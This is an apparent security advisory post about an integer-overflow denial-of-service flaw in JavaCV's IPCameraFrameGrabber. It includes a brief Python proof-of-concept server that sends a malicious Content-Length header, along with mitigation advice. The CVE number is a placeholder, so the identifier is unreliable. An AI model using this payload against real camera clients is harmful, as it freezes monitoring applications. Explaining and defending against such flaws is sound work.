JavaCV, Integer Overflow, CVE-2024-XXXX (Critical) -DC-Oct2026-3299

Listen to this Post

The vulnerability resides within the `IPCameraFrameGrabber.java` component of JavaCV, specifically in how it parses the `Content-Length` header from multipart MJPEG HTTP streams returned by IP cameras. When an attacker supplies an unvalidated, malicious `Content-Length` value between 1073741825 and 2147483647, it forces the internal buffer capacity-doubling function `ensureBufferCapacity(int)` into a 32-bit signed integer overflow. Because the multiplier logic wraps around negative values and eventually hits zero, the loop’s termination condition (capacity < desiredCapacity) becomes an unbreakable infinite loop. This traps the calling application thread in a 100% CPU utilization spinlock without throwing exceptions or responding to interruption paths, causing a permanent thread hang and denial of service.

What Undercode Say:

Analytics

The vulnerability is caused by missing validation bounds on HTTP response headers when processing continuous streams. In Java, signed 32-bit integer boundaries can easily wrap around during unchecked capacity growth routines, changing positive magnitude check logic into permanent logic loops.

How Exploit: (Educational Purposes!)

import socket
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srv.bind(("0.0.0.0", 8080))
srv.listen(1)
conn, _ = srv.accept()
conn.recv(4096)
malicious_length = 2000000000
header = (
"--myboundary\r\n"
"Content-Type: image/jpeg\r\n"
"Content-Length: %d\r\n\r\n" % malicious_length
)
conn.sendall(header.encode())

Protection: from this CVE

Implement strict maximum upper-bound checks on incoming `Content-Length` header metadata before allocating or modifying buffer arrays, ensuring oversized or negative values are immediately rejected.

Impact

Applications utilizing `IPCameraFrameGrabber` over plaintext HTTP connections are vulnerable to man-in-the-middle attackers or compromised cameras injecting malicious response headers, resulting in persistent thread exhaustion, total CPU lockup, and widespread denial of service across monitoring backends.
